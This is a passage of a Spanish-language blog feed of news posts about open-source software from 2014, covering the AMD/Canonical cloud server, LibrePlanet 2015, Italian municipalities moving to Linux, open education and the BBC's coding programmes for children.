<p>Esta nueva nube en una solución de caja que es probable que obtenga mucha más atención, lo que es bueno tanto para AMD como para <em>Ubuntu</em>. La solución consiste en un servidor <em>SeaMicro</em> SM15000 y el <em>software</em> de <em>Canonical</em> consiste en:</p>
<ul>
<li>3 Controladoras de nube.</li>
<li>57 nodos <em>Nova</em>.</li>
<li>3 nodos <em>Cinder</em>.</li>
<li>64 TB de almacenamiento.</li>
<li>128 GbE NIC (Max. 512).</li>
<li>Conmutador de capa 2 integrado.</li>
<li>80 Gbps de E/S.</li>
<li>Consume 55 vatios por servidor.</li>
<li><em>Ubuntu</em> LTS 14.04 y <em>OpenStack</em>.</li>
<li>MAAS.</li>
<li><em>Juju</em>.</li>
</ul>
<p>Los clientes obtienen simplicidad al implementar una nube privada.
Una de las ventajas de crearla como una unidad de 10U es que encajará rápidamente en el espacio ocupado actualmente por soluciones de servidores <em>blade</em> existentes. Con muchas grandes organizaciones que luchan para desplegar <em>OpenStack</em> en la parte superior de su infraestructura de servidor <em>blade</em> actual, esta simplicidad atraerá.</p>
<p>Otra ventaja es el bajo consumo de energía de la <em>SeaMicro</em> SM15000 en comparación con una solución <em>blade</em> HP o Dell. Esto hará que sea atractivo no sólo para aquellas empresas que buscan una nube privada en las instalaciones, sino también para los proveedores de servicios que buscan soluciones simples de nube privada que pueden ofrecer a los clientes de tamaño medio.</p>
<p>Según Dhiraj Mallick, vicepresidente corporativo y gerente general de soluciones de centro de datos de servidor de AMD:</p>
<blockquote>
<p>&ldquo;AMD y Canonical han dedicado una enorme cantidad derecursos de ingeniería para asegurar una solución integrada queelimina la complejidad de la implementación de la tecnologíaOpenStack. El servidor SM15000, Ubuntu LTS 14.04 yOpenStack es una solución increíble que llena una necesidad en la industria sobre una solución OpenStack que se puede implementar fácilmente sin tener que gastar una fortuna en la contratación de servicios profesionales o equipos de personas.&rdquo;</p>
</blockquote>
<p>Lo más importante en este caso para los clientes es que se trata de una solución totalmente convergente que no requiere grandes cantidades de configuración o de formación. Ha habido un aumento en los dispositivos convergentes, especialmente alrededor del almacenamiento y las bases de datos, por lo que añadir la nube en una caja como una solución convergente tiene sentido.</p>
<h2 id="qué-obtendrán-amd-y-canonical-de-todo-esto">¿Qué obtendrán AMD y Canonical de todo esto?</h2>
<p>Tanto para AMD como para <em>Canonical</em> esto es más que sólo otra oferta de productos en un mercado cada vez más concurrido. AMD ha estado a la defensiva contra <em>Intel</em> en los últimos años y ha decidido que la mejor manera de avanzar es el hiper-escalado, los servidores de bajo consumo y ARM. Se ha introducido un procesador ARM de 64 bits diseñado para el centro de datos en la nube conocida como AMD <em>Opteron</em> 1100 o &ldquo;<em>Seattle</em>&rdquo;.</p>
<p>El procesador inicial de esta solución es el procesador AMD <em>Opteron</em>&quot;<em>Piledriver</em>&quot; con la opción de procesadores <em>Intel Xeon &ldquo;Haswell&rdquo;</em> y &ldquo;<em>Ivybridge</em>&rdquo;. Mirando hacia el futuro, sin embargo, es difícil ignorar el potencial de una opción AMD <em>Opteron &ldquo;Seattle</em>&rdquo; en algún momento en el futuro en función de la carga de trabajo y la demanda de los clientes.</p>
<p><em>Canonical</em> se beneficiará más de AMD. <em>Ubuntu</em> sigue siendo visto como una mala opción frente a <em>Red Hat</em> o <em>SUSE Linux</em> a pesar de acuerdos tanto con <em>Cisco</em> como con IBM. Este último ha estado apoyando fuertemente a <em>Ubuntu</em> con su nueva gama de soluciones POWER 8 y <em>Canonical</em> ha contribuido portando más de 40.000 aplicaciones a IBM POWER.</p>
<p>A pesar de este compromiso por parte de <em>Canonical</em>, IBM ha admitido que todavía tiene que conseguir que <em>Red Hat</em> y SUSE anuncien que sus soluciones <em>little-endian Linux</em> se podrán ejecutar en la plataformade POWER 8 para mejorar su credibilidad. Por desgracia esto no ayuda a la imagen de <em>Canonical</em> y <em>Ubuntu</em>, pero los acuerdos con <em>Cisco</em> y ahora AMD le dará mayor presencia.</p>
<p>Detrás de las escenas, <em>Canonical</em> ha hecho otras ofertas que lo convierten en un jugador más grande de <em>Linux</em> lo que muchos creen. En junio se firmó un acuerdo con <em>Mirantis</em> para asegurar que <em>Ubuntu</em> y <em>Mirantis OpenStack</em> trabajarán perfectamente. Ese acuerdo ha dado lugar a la versión de <em>OpenStack</em> que se distribuye en esta solución.</p>
<p>Además, <em>Canonical</em> ha firmado un acuerdo con <em>Docker</em> para garantizar que su solución de contenedores se ejecuta sin problemas en <em>Ubuntu</em>. Esto también hará que sea más atractivo para los clientes empresariales ya que <em>Docker</em> se está convirtiendo rápidamente en el nuevo estándar de contenedores.</p>
<h2 id="conclusión">Conclusión</h2>
<p>Este parece ser un buen negocio en general. Mientras que algunos clientes pueden no ser conscientes de <em>Ubuntu</em> en el espacio empresarial de <em>Linux</em>, que es más que capaz de mantenerse por si misma contra <em>Red Hat</em> y SUSE. El SM15000 de AMD no es sólo una tecnología probada, sino que es un reemplazo completo del sistema de <em>blades</em> con la potencia suficiente para la más compleja de las tareas. El resultado es que los clientes que han luchado con las implementaciones de nubes privadas pueden ahora acelerar ese proceso con una solución totalmente convergente.
Hay otros jugadores que ya están en el mercado con sus propias soluciones convergentes. <em>VMware</em> ha anunciado soluciones con algunos de sus socios de <em>hardware</em>, y HP está tratando de implementar <em>Helion</em> como una nube en una caja para los clientes del sistema <em>blade</em> existentes. ¿Tendrán AMD y <em>Ubuntu</em> éxito en este mercado? Será difícil, pero hay un montón de oportunidades en el mercado para otra solución, especialmente una que esté bien desarrollada e integrada como esta.</p>
<p>Fuente original traducida: <a href="https://www.business-cloud.com/articles/news/amd-cloud-box">https://www.business-cloud.com/articles/news/amd-cloud-box</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>LibrePlanet, la conferencia anual de software libre fin de semana del 21 de  marzo de 2015</title>
      <link>https://www.igalvan.es/posts/libreplanet-la-conferencia-anual-de/</link>
      <pubDate>Wed, 17 Sep 2014 21:38:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/libreplanet-la-conferencia-anual-de/</guid>
      <description><![CDATA[<p>La Fundación para el <em>Software</em> Libre (FSF) y la Junta de Tratamiento de la Información del Estudiante (SIPB) del MIT anunció hoy las fechas para la conferencia de <em>software</em> libre <em>LibrePlanet</em>, que se celebrará de entre los días 21 y 22 de marzo del próximo año 2015, en la ciudad de <em>Cambridge</em> en los Estados Unidos. La convocatoria de las sesiones está abierta, así como la convocatoria de expositores y voluntarios.</p>
<p><em>LibrePlanet</em> es una conferencia anual para los amantes del *software *libre. La conferencia reúne a los desarrolladores de <em>software</em>, expertos en políticas, activistas y usuarios de ordenadores para aprender habilidades, logros de las acciones y desafíos de cara a la libertad del <em>software</em>. Los recién llegados son siempre bienvenidos, y <em>LibrePlanet</em>2015 contará con programación para todas las edades y niveles de experiencia.</p>
<p>Este año, el tema de <em>LibrePlanet</em> es &ldquo;<em>Software</em> Libre en todas partes&rdquo;. La convocatoria de las sesiones busca conversaciones que traten sobre los muchos lugares y formas en los que el <em>software</em> libre se está utilizando en todo el mundo, así como la manera de hacer que el <em>software</em> libre se expanda en todas partes. Se fomentarán las propuestas que hablen sobre “<em>en todas partes</em>” en el sentido amplio de la expresión. <em>LibrePlanet</em> 2015 llevará la libertad del <em>software</em> a todo el mundo, al espacio exterior, y considerará su papel en la industria, el gobierno, la academia, la organización comunitaria y la informática personal.</p>
<blockquote>
<p>“LibrePlanet es una de las cosas más
gratificantes que hacemos durante todo el año. Esta conferencia reúne a gente de todo el planeta que quieren hacer del mundo un lugar mejor con el software libre”</p>
</blockquote>
<p>dijo John Sullivan, director ejecutivo de la FSF.</p>
<blockquote>
<p>“Esperamos recibir propuestas de sesiones de personas con todos los niveles de oratoria y experiencia técnica, no tienes que ser un programador para hablar en LibrePlanet. Los usuarios de software libre, activistas, académicos, legisladores, desarrolladores y muchos otros, son todos contribuyentes clave para el movimiento del software libre, y queremos mostrar todas estas habilidades en LibrePlanet 2015″</p>
</blockquote>
<p>, dijo Libby Reinish, una gestora de campañas en la FSF.</p>
<p>Las peticiones para realizar una intervención en el evento se pueden solicitar en <a href="https://www.libreplanet.org/2015/call_for_sessions">https://www.libreplanet.org/2015/call_for_sessions</a> y el plazo estará abierto hasta el domingo 2 de noviembre de 2014 a las 23:59 (UTC).</p>
<p>Para suscribirse a las noticias sobre LibrePlanet 2015, visita la web<a href="https://www.libreplanet.org/2015">https://www.libreplanet.org/2015</a>.</p>
<h2 id="libreplanet-2014">LibrePlanet 2014</h2>
<p>LibrePlanet 2014 se llevó a cabo en el MIT los días 22-23 de marzo de 2014 con más de 350 asistentes de todo el mundo que se reunieron para las conversaciones, demostraciones y conferencias magistrales centradas en el tema de “Free Software, Free Society”. Puedes ver los vídeos de las conferencias anteriores en <a href="http://media.libreplanet.org/">http://media.libreplanet.org</a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El Municipio de Udine migrará a Linux para ahorrarse 360.000 euros</title>
      <link>https://www.igalvan.es/posts/el-municipio-de-udine-migrara-linux/</link>
      <pubDate>Tue, 16 Sep 2014 21:31:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-municipio-de-udine-migrara-linux/</guid>
      <description><![CDATA[<p>El otro día publicábamos una noticia sobre <a href="http://www.igalvit.es/aapp/2014/08/27/turin-ahorra-seis-millones-de-euros.html">la intención de la ciudad de Turín de migrar sus equipos a software libre</a> y hoy nos hemos encontrado con la buena noticia de que la ciudad de Udine se une a este selecto grupo.</p>
<p>La ciudad de Udine ha decidido centrarse en <em>Linux</em> y en la migración a <em>software</em> de código abierto que permitirá ahorrar a la ciudad más de 360.000 euros de dinero público.</p>
<p>Son muchos los municipios italianos que están (por fin) considerando seriamente pasarse a <em>Linux</em> y al <em>software</em> libre, que además de permitirles reducir su factura tecnológica, les proporciona sistemas más estables y seguros.</p>
<p>La migración cubrirá aproximadamente 900 ordenadores personales repartidos entre las distintas dependencias municipales y que deberá ser completado durante el año 2015 produciendo el ahorro de más estos 360.000 euros de dinero público según anunció Gabriel Giacomini del Departamento para la Innovación de la ciudad de Udine, que reconoce como el <em>software</em> libre se ha convertido cada vez más completa y fiable y que por tanto la migración no sólo ahorrará dinero, sino que también mantendrá operativo el mismo ordenador personal por varios años más.</p>
<p>La migración irá acompañada también de formación para todo el personal municipal, y estiman que a finales de año más del 40% de los empleados  municipales será capaz de trabajar en <em>Linux</em> y <em>software</em> de código abierto.</p>
<p>A fecha de hoy no sabemos la distribución <em>Linux</em> que será elegida para la migración, en cambio si esta clara la elección del paquete ofimática que será usado como alternativa a <em>Microsoft Office</em>, en este caso <em>Apache OpenOffice</em>.</p>
<p>Felicitaciones a la ciudad de Udine por haberse decidido por <em>Linux</em> y el <em>software libre</em>.</p>
<p>Como nota final indicar que no son estas dos las únicas iniciativas que se están desarrollando en Italia. En los últimos meses muchas otras organizaciones gubernamentales locales han dicho adiós a <em>Microsoft</em> cogiendo al <em>software</em> libre en su lugar.Entre ellos se encuentran la provincia autónoma de Tirol del Sur, las provincias de Perugia y Terni y la región de Umbría.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Presión para el código abierto y Linux en las escuelas</title>
      <link>https://www.igalvan.es/posts/presion-para-el-codigo-abierto-y-linux/</link>
      <pubDate>Mon, 15 Sep 2014 21:29:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/presion-para-el-codigo-abierto-y-linux/</guid>
      <description><![CDATA[<p>Hace unos ocho años, empecé a ejercer presión para traer más
<em>Linux</em> y <em>software</em> de código abierto a las escuelas secundarias y a las
instituciones de formación profesional superior de TI en los Países Bajos y Bélgica. Así es como lo hice y lo que puedes aprender para hacer lo mismo donde vivas.</p>
<p>En primer lugar, <em>Linux</em> y el código abierto en la educación se pueden
clasificar en tres vertientes:</p>
<ul>
<li>La infraestructura de las escuela.</li>
<li>El escritorio con el que trabajan los alumnos y los profesores.</li>
<li>El plan de estudios para la educación de TI.</li>
</ul>
<p>El primer punto, la infraestructura en las escuelas consiste en un montón de diferentes programas informáticos, que se utiliza para la administración. Ejemplos de las aplicaciones como los sistemas de gestión de los estudiantes, los sistemas de gestión de documentos y los sistemas operativos. Básicamente, este <em>software</em> no es tan diferente de lo que se utiliza en otras industrias. Esto se aplica no sólo a la formación profesional, sino a todas las escuelas de cualquier nivel.</p>
<p>El segundo punto, las ordenadores de escritorio que se utilizan en las escuelas están funcionando principalmente en <em>Microsoft Windows®</em>, y gracias a un empujón para conseguir iPads® en las escuelas, sabemos también que pueden
educar con la ayuda de otros dispositivos. Así que, ¿por qué no un escritorio
<em>Linux</em>?</p>
<p>Por último, en la lista de puntos, he centrado la mayor parte de mi atención, tiempo y energía en el plan de estudios para la educación de TI en educación media y profesional superior en los Países Bajos. Hasta hace cinco años, yo era como una voz en el desierto cuando defendí por <em>Linux</em> y el código abierto en los planes de estudio. A menudo se reían de mí cuando predecía que <em>Linux</em> sería el sistema operativo más utilizado para los servidores. Hoy en día, nadie niega que <em>Linux</em> es un serio competidor en el mundo de los servidores.</p>
<p>Hasta hace muy poco, yo era parte de una comisión para traer un nuevo plan de
estudios para una escuela profesional superior para los administradores de
sistemas. Más de la mitad de las personas presentes estaban convencidos de que
<em>Linux</em> y el código abierto son indispensables para el centro de datos. Y, los administradores de hospedaje <em>Linux</em> y el código abierto son esenciales para que los graduados pudieran conseguir un trabajo en su empresa.</p>
<p>Para este grupo objetivo, es muy importante que el <em>software</em> sea escalable hacia arriba y hacia abajo, tanto técnica como económicamente. Afirman que esto es sólo lo suficientemente flexible con <em>software</em> de código abierto. Si ellos no son flexibles y sus competidores lo son, no pueden sobrevivir.</p>
<p>Un desarrollo más reciente que derribará muchas barreras en las escuelas que
quieren enseñar <em>Linux</em>, es la disponibilidad de material de <em>Linux</em> gratuita a través de la Academia Cisco. Desde este ciclo escolar diez millones de estudiantes en todo el mundo tienen acceso gratuito a materiales de enseñanza de nivel de entrada de <em>Linux</em> a través de este método. Se trata de material
didáctico basado en el conjunto mundial de objetivos de <em>LPI Linux Essentials</em>.</p>
<p>Este es el siguiente paso en la dirección correcta, pero aún no estamos allí. Por el momento, hay muchos maestros en TI, que no tienen conocimiento o experiencia con <em>Linux</em> y <em>software</em> de código abierto. Así, proveyendo a los profesores de la formación adecuada y la certificación correspondiente es cómo podemos ayudar más.</p>
<p>¿Está su escuela enseñando <em>Linux</em> y <em>software</em> de código abierto?</p>
<p>El tren ha salido de la estación y no va a parar.  Depende de las escuelas y de los profesores asegurarse de que salten a bordo. ¿Lo harás tú?</p>
<p>Publicación original: <em>Dutch Linux Magazine</em>, Número 15, Julio/Agosto 2014.</p>
<p>[1] Abreviatura de Tecnologías de la Información.</p>
<p>[2] Traducido del inglés <em>hosting</em>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Debian cumple 21 años</title>
      <link>https://www.igalvan.es/posts/debian-cumple-21-anos/</link>
      <pubDate>Mon, 15 Sep 2014 21:27:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/debian-cumple-21-anos/</guid>
      <description><![CDATA[<p><em>Debian</em> cumple 21 años de existencia y desde esta bitácora quiero desearles a los miembros de esta comunidad una muy larga y prospera vida para este proyecto, y de paso dar las gracias a la gente que en algún momento ha colaborado para que todos podamos disfrutar de esta gran distribución. Gracias a todos y ¡larga vida a Debian!</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>MusOpen, música clásica sin derechos de autor</title>
      <link>https://www.igalvan.es/posts/musopen-musica-clasica-sin-derechos-de/</link>
      <pubDate>Thu, 11 Sep 2014 21:22:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/musopen-musica-clasica-sin-derechos-de/</guid>
      <description><![CDATA[<p>Es algo curioso esto de los derechos de autor, los herederos de personas que han compuesto obras, este caso hablamos de música, hace más de doscientos años siguen exigiendo el pago de tasas por derechos de autor puesto que así se lo permiten las leyes internacionales.</p>
<p>Todos los amantes de la música en general llevamos exigiendo hace mucho tiempo, sin ningún resultado, que este tipo de obras deben ser de dominio público para permitir su difusión entre todas las personas.</p>
<p>Por suerte, existen iniciativas con las de <a href="https://musopen.org/">MusOpen</a> que nos permiten disfrutar de música sin estos <em>royalties</em>, aunque en este caso sean solo obras de música clásica. Esperamos que las disfrutes.</p>
<p>Fuente: <a href="https://musopen.org/">https://musopen.org</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Un cambio global hacia las fuentes abiertas en la Universidad</title>
      <link>https://www.igalvan.es/posts/un-cambio-global-hacia-las-fuentes/</link>
      <pubDate>Thu, 11 Sep 2014 21:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/un-cambio-global-hacia-las-fuentes/</guid>
      <description><![CDATA[<p>Probablemente ya hayas oído hablar del programa <em>OpenCourseWare</em> del MIT; o por lo menos, habrás oído que algunas universidades están ofreciendo versiones de sus cursos en línea de forma gratuita. Pero, ¿qué significa eso? Que alguien con una conexión a <em>Internet</em> puede obtener un título de grado del MIT? La respuesta sigue siendo, más o menos, &ldquo;No es tan fácil.&rdquo;</p>
<p>Históricamente, las universidades no eran lugares inclusivos. Mientras que puedes encontrar educación gratuita universidad tradicional (el tan alabado sistema educativo de Noruega me viene a la mente, al igual que los de algunos otros países europeos), la gran mayoría del mundo simplemente no tenía acceso a la educación superior antes de la aparición de las tecnologías en línea. Esto hizo que la educación superior fuera en gran medida un ejercicio en el refuerzo de las clases (sociales) y los géneros. En décadas más recientes, las universidades han sido agresivamente monetizadas, lo que elimina en teoría la clase y el género como factores de exclusión, pero de manera más realista, simplemente actúa para reforzar la exclusividad y la falta de acceso a un mayor nivel de estudios.</p>
<p>La idea de abrir públicamente los estudios universitarios fue vista inicialmente en Alemania en el año 1999, pero fue popularizada por el MIT con el lanzamiento de <em>OpenCourseWare</em>  (OCW) en el año 2002. La idea era facilitar el aprendizaje mediante el rápido crecimiento de <em>Internet</em>; los
estudiantes pueden tener acceso a una gran cantidad de conocimiento para
complementar sus estudios, prepararse mejor para la universidad y, en algunos
casos, obtener una ventaja sobre temas difíciles. Esto no era nada parecido a
un grado completo o incluso temarios completos, era más como el acceso a
recursos y materiales de lectura.</p>
<p>Un avance rápido hasta 2012 y el programa OCW había explotado en toda América y en todo el mundo. Sin embargo, el aprendizaje en línea también se había generalizado, con muchas universidades que ofrecen grados en línea que proporcionan la misma calificación que los cursos tradicionales en el aula. Ahora, se espera que las universidades ofrezcan una amplia gama de materiales en línea suplementarios para acompañar el aprendizaje en el campus, y que sea posible ganar calificaciones completas sin siquiera poner un pie en el recinto universitario. OCW ha evolucionado posteriormente, con el concepto del &ldquo;<em>curso
masivo abierto en línea</em>&rdquo;, o MOOC, ganando rápidamente impulso.</p>
<p><em>Coursera</em>, el MOOC más popular en la actualidad, cuenta con más de 7,2 millones de usuarios y conecta a un gran grupo de instituciones de
educación superior con los usuarios, que pueden acceder a los materiales del
curso de forma gratuita. Este es un modelo de negocio con fines de lucro que
aporta un valor añadido a través de diversos medios, como ofreciendo la
certificación por un precio nominal y la prestación de servicios de conexión
de reclutamiento profesional. <em>edX</em>es la versión sin animo de lucro del MIT de <em>Coursera</em>, que se construye utilizando el <em>software</em> de código abierto. Ambas
organizaciones buscan redefinir la forma en que se consume la educación, con
el objetivo de ser un menor coste y una distribución más amplia.</p>
<p>Volviendo a la pregunta inicial de lo que representa este cambio global, ahora es posible acceder a una gran cantidad de recursos de estudio de las universidades y otras instituciones de educación superior, tanto humildes y de prestigio. Algunas personas tienen una reacción instintiva de cuestionar por qué incluso pagaron por su grado, y la forma en que deben esperar las universidades sigan siendo un éxito si nadie paga. Quienes están familiarizados con el código abierto reconocerá estos argumentos; la gente utiliza la misma retórica para descartar el movimiento de la tecnología de código abierto como una pérdida de tiempo o incluso perjudicial para la rentabilidad de la empresa. Sin embargo, como se explica en el sitio web OCW, las universidades se enriquecen en gran medida por la participación en la educación de código abierto:</p>
<blockquote>
<p>“A través de OCW, los educadores a mejorar los cursos y programas de estudio, por lo que sus escuelas sean más eficaces; los estudiantes a encontrar recursos adicionales para ayudar a tener éxito, y estudiantes independientes enriquecen sus vidas y utilizar el contenido para hacer frente a algunos de los retos más difíciles de nuestro mundo, incluyendo el desarrollo sostenible, el clima cambio, y la erradicación del cáncer.</p>
</blockquote>
<p>Básicamente, el argumento es el mismo: MOOCs y OCW ofrecen los recursos,
pero no el apoyo. Pagar por un grado significa que tiene acceso a la gama
completa de apoyo a la educación que se ofrece. Pero al igual que otras áreas
de código abierto, las comunidades MOOC y OCW están llenas de una amplia gama
de estudiantes, profesores, profesionales, y <em>practicantes</em> que trabajan juntos. Los mismos principios se aplican a la educación como lo hacen en el resto del mundo abierto. Involúcrese, sea parte de una comunidad, sea apoyado, y contribuya a una mayor difusión de los conocimientos para su propio beneficio tanto como cualquier otra persona.</p>
<p>Traducido de la fuente original:<a href="http://opensource.com/education/14/9/global-shift-open-source-university-studies">http://opensource.com/education/14/9/global-shift-open-source-university-studies</a></p>
<p>Fuente de la imagen:<a href="https://www.flickr.com/photos/youraccount/7839525406/?rb=1">https://www.flickr.com/photos/youraccount/7839525406/?rb=1</a></p>
<p>[1] La palabra en el texto original es <em>practitioners</em> y no he encontrado ninguna traducción que no tenga que ver con el mundo de la medicina, por lo que he decidido traducirlo literalmente.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El valor del software de fuentes abiertas en las Administraciones Publicas</title>
      <link>https://www.igalvan.es/posts/el-valor-del-software-de-fuentes/</link>
      <pubDate>Mon, 08 Sep 2014 21:12:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-valor-del-software-de-fuentes/</guid>
      <description><![CDATA[<p>Hoy os dejamos un enlace  a un artículo que ha publicado <a href="https://twitter.com/Sergiolat_">Sergio Martínez</a> en <a href="http://mundoerp.com/">MundoERP</a> de fuentes abiertas en las Administraciones Publicas.</p>
<p>Coincido casi por completo con las razones que esgrime en este artículo
para defender el uso de <em>software</em> de fuentes abiertas en todas los organismos que constituyen nuestra Administración.</p>
<p>Echadle un vistazo y no dudéis en dejar vuestros comentarios tanto en este <em>blog</em> como en nuestras páginas en las redes sociales.</p>
<p>Fuente:
<a href="http://mundoerp.com/blog/valor-software-de-fuentes-abiertas-sfa-administracion/">http://mundoerp.com/blog/valor-software-de-fuentes-abiertas-sfa-administracion/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Plataforma Administración Local Soluciones (PALS), una iniciativa del MINETUR</title>
      <link>https://www.igalvan.es/posts/plataforma-administracion-local/</link>
      <pubDate>Fri, 05 Sep 2014 21:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/plataforma-administracion-local/</guid>
      <description><![CDATA[<p>Pocas son las iniciativas que tiene el Gobierno de España en lo relacionado con el <em>Open Source</em> y las soluciones para las Administraciones Públicas, pero cuando aparecen uno debe ser justo, analizarlas y aplaudirlas cuando se lo merecen. En este caso es el MINETUR con la Plataforma Administración Local Soluciones (PALS).</p>
<p>Según la propia web de la iniciativa se definen como:</p>
<blockquote>
<p>“Plataforma Administración Local Soluciones (PALS) es una Plataforma de Aplicaciones informáticas gratuitas que el Ministerio de Industria, Energía y Turismo ha desarrollado en colaboración con las Entidades Locales atendiendo a sus necesidades y recogiendo sus iniciativas, que facilitan la gestión interna y la prestación de Servicios Públicos Digitales.”
“Todas estas aplicaciones propician y facilitan a las entidades el cumplimiento de la ley 11/2007 de Acceso Electrónico de los Ciudadanos a los Servicios Públicos.
Asimismo, todas ellas han pasado auditorías de calidad, usabilidad, seguridad y accesibilidad realizadas por INTECO”</p>
</blockquote>
<p>De momento esta plataforma está compuesta por seis aplicaciones gratuitas y, lo más importe, son soluciones libres.</p>
<ul>
<li>AL SIGM: Gestión administrativa de la entidad.</li>
<li>AL LocalGIS : Sistema de Información Geográfico.</li>
<li>AL e-fácil: Incorpora la recepción de factura electrónica (formato facturae) y la constitución telemática de empresas (CIRCE local).</li>
<li>AL Padrón: Sistema Integrado de Gestión de Padrón de habitantes.</li>
<li>AL ConfiAAs : incorpora los Módulos integrables Administración Local INTAV y cAptchAlocAl que mejoran la accesibilidad y la seguridad.</li>
<li>AL LOPD: Herramienta de apoyo a las Administraciones Públicas para su adaptación y cumplimiento de la Ley Orgánica de Protección de Datos (LOPD) y la Ley de Servicios de la Sociedad de la Información (LSSI).</li>
</ul>
<p>Debido al desconocimiento que tenemos sobre ellas, seguramente propiciado porque la propia Administración no ha hecho mucha publicidad de ellas, vamos a dedicar desde este portal una serie propia para cada una de ellas donde las iremos analizando e intentando proporcionaros una critica constructiva para que os forméis, como siempre intentamos, vuestra propia opinión.</p>
<p>Fuente:
<a href="https://www.planavanza.es/avanzalocal/Soluciones/Paginas/ALsoluciones.aspx">https://www.planavanza.es/avanzalocal/Soluciones/Paginas/ALsoluciones.aspx</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>HealthDirect Australia utiliza software Open Source en su solución de Gestión de Identidades</title>
      <link>https://www.igalvan.es/posts/healthdirect-australia-utiliza-software/</link>
      <pubDate>Thu, 04 Sep 2014 21:06:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/healthdirect-australia-utiliza-software/</guid>
      <description><![CDATA[<p>La <em>Commonwealth</em> y el Gobierno de Australia financiaron a una empresa pública llamada <em>HealthDirect Australia</em> que ha utilizado <em>software Open Source</em> para construir una solución de gestión de identidades y accesos (IAM).</p>
<p>Esta solución IAM permite a los usuarios tener una identidad a través de todos sus sitios <em>web</em> y aplicaciones mediante el inicio de sesión con sus cuentas de <em>Facebook</em>, <em>LinkedIn</em> o <em>GMail</em> personales.</p>
<p>Bruce Haefele, responsable del proyecto de <em>HealthDirect Australia</em>, explicó que el inicio de sesión único es importante ya permite el acceso simplificado a una serie de sitios <em>web</em> de asesoramiento de salud como algunos relacionados con el embarazo y el cuidado de bebes para los nuevos
padres.</p>
<blockquote>
<p>Trabajamos con otros socios de la industria [de la salud] para que la información disponible sea apropiada para los australianos y que cumpla con las directrices de salud. No es tan aleatorio como buscar Doctor Google”,</p>
</blockquote>
<p>bromeó.</p>
<p><em>HealthDirect Australia</em> también opera un directorio de los servicios nacionales de salud de todas las organizaciones de proveedores en Australia. Es accesible en el <em>iPhone</em> y en dispositivos <em>Android</em> para que las personas puedan buscar servicios de salud en su teléfono. Por ejemplo, los consumidores pueden introducir su código postal para encontrar la ubicación de la farmacia de urgencias más cercana a su ubicación durante la noche.</p>
<p>Además, la organización ofrece servicios de llamadas gratuitas para los australianos, incluyendo una línea de selección de enfermería 24/7, que la gente puede utilizar para llamar y hablar con una enfermera acerca de su salud.</p>
<blockquote>
<p>“Desde el principio, hemos identificado que si vamos a ser una organización segura y de confianza, necesitábamos tener un fuerte enfoque en la seguridad”,</p>
</blockquote>
<p>dijo Haefele.</p>
<blockquote>
<p>“Con el tiempo que ha evolucionado a medida que el gobierno federal nos ha obligado a cumplir con su Manual de Seguridad de la Información [ISM]. También tenemos que cumplir con la Ley de Privacidad y la ley de Historia Clínica Electrónica Controlada Personalmente [PCEHR]”.</p>
</blockquote>
<p><em>HealthDirect Australia</em> estaba comenzando a desarrollar la solución de gestión de identidades y accesos en el año 2012, no contaba con especialistas en seguridad cibernética en su personal. Se seleccionó a <em>First Point Global</em>como proveedor de servicios de seguridad para el diseño e implementación del IAM.</p>
<blockquote>
<p>“En nuestra infraestructura IAM, la mayor parte se implementa en productos de código abierto que fueron recomendados por First Point Global“,</p>
</blockquote>
<p>dijo.</p>
<blockquote>
<p>“Por ejemplo, utilizamos Splunk para la supervisión de seguridad y
una software de gestión de logs de código abierto llamado Log Stash. En otros casos, vamos a utilizar los productos comerciales, pero si sólo si no hay una buena alternativa de código abierto”.</p>
</blockquote>
<p>Además de la IAM, <em>First Point Global</em> implementó una solución de gestión de cortafuegos de aplicaciones <em>web</em>, detección y prevención de intrusiones y vulnerabilidades.</p>
<p>Fuente:<a href="http://www.techworld.com.au/article/553985/healthdirect_australia_sees_value_open_source_security_solution/">http://www.techworld.com.au/article/553985/healthdirect_australia_sees_value_open_source_security_solution/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La BBC enseña a programar a los niños a través de la TV e Internet</title>
      <link>https://www.igalvan.es/posts/la-bbc-ensena-programar-los-ninos/</link>
      <pubDate>Wed, 03 Sep 2014 21:32:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-bbc-ensena-programar-los-ninos/</guid>
      <description><![CDATA[<p>Coincidiendo con la introducción del nuevo plan de estudios de informática en Inglaterra, la BBC ha publicado guías de estudio la programación de computadoras, cuestionarios y otros materiales de apoyo en su sitio <em>Bitesize</em> al mismo tiempo que han informado que se emitirán en el otoño varios programas de televisión infantiles donde trataran temas relacionados con la programación.</p>
<p>Los nuevos materiales en <em>Bitesize</em> cubren cuarenta elementos diferentes adaptados al nuevo plan de estudios, que van desde el nivel hasta la escuela primaria a los exámenes GCSE.</p>
<p>Los temas para los alumnos más jóvenes incluyen programas de depuración, la escritura de código de animación y explicaciones de cómo funciona <em>Internet</em>. La cobertura para los niños más mayores, incluye algoritmos de representación de datos y binarios.</p>
<p>Entre los programas de televisión con temática tecnológica que van a emitir a partir de finales de año destacan los siguientes:</p>
<ul>
<li><em>Technobabble</em>. Un programa con tematica orientada a las aplicaciones y los gadgets hecha por el equipo de <em>Newsround</em> que está diseñado para alentar
a su público a ampliar sus conocimientos sobre informática.</li>
